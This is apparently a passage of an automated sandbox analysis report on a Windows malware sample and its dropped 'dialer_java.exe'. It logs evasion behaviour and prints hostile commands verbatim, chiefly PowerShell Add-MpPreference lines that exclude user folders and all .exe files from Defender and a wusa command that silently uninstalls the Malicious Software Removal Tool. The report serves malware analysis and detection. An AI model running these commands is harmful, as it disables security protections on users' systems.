Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7553
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7451
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8037
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1519
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6128
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8148
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3111
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6842
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7734
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1697
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeAPI coverage: 0.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeAPI coverage: 0.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeAPI coverage: 6.3 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 0.7 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeAPI coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeAPI coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeAPI coverage: 6.3 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeAPI coverage: 6.4 %
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeAPI coverage: 6.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 908Thread sleep count: 6629 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5576Thread sleep count: 3149 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep count: 7017 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep count: 2574 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 5924 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 3778 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 7591 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544Thread sleep count: 1945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep count: 7553 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep count: 1908 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 7451 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7644Thread sleep count: 2142 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 8037 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 1519 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 6128 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 3648 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep count: 8148 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 1194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836Thread sleep count: 7891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4248Thread sleep count: 1587 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5264Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612Thread sleep count: 6415 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612Thread sleep count: 3111 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 7475 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308Thread sleep count: 2096 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep count: 6842 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep count: 2656 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5376Thread sleep count: 7734 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 976Thread sleep count: 1697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400389D0 MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,FindClose,25_2_00000001400389D0
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140038E50 strncpy,MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,malloc,FindClose,25_2_0000000140038E50
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140009160 GetSystemInfo,25_2_0000000140009160
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: conhost.exe, 00000019.00000002.3065606793.00000164780B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: B;Nk7sHQPmx\cru\|Rmf[;n.zi]h5_e;k\N/_JfKqeMUkRWpncO)zNGp&~X~.zX
Source: conhost.exe, 00000019.00000002.3065200958.00000164766F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: conhost.exe, 00000019.00000003.1964179772.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1963510932.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1965743221.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1964872202.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000002.3065200958.0000016476762000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000019.00000003.1962703704.0000016476762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeCode function: 0_2_00007FF6099B1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6099B1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 16_2_00007FF6E3A61160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,16_2_00007FF6E3A61160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 17_2_00007FF6E3A61160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,17_2_00007FF6E3A61160
Source: C:\Windows\System32\conhost.exeCode function: 25_2_000000014000118B Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,25_2_000000014000118B
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400011D8 _initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,25_2_00000001400011D8
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 35_2_00007FF75B4A1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,35_2_00007FF75B4A1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 49_2_00007FF6ECFF1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,49_2_00007FF6ECFF1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 69_2_00007FF71BD51160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,69_2_00007FF71BD51160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 83_2_00007FF7C0EF1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,83_2_00007FF7C0EF1160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF642721160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,97_2_00007FF642721160

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeThread register set: target process: 7720Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager | C:\Windows\explorer.exe889-028
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager | C:\\Windows\\explorer.exe"}
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager | C:\Windows\explorer.exe
Source: conhost.exe, 00000019.00000002.3065565721.0000016476A95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3.4.3","vram":"0","windowTitle":"Program Manager | C:\\Windows\\explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
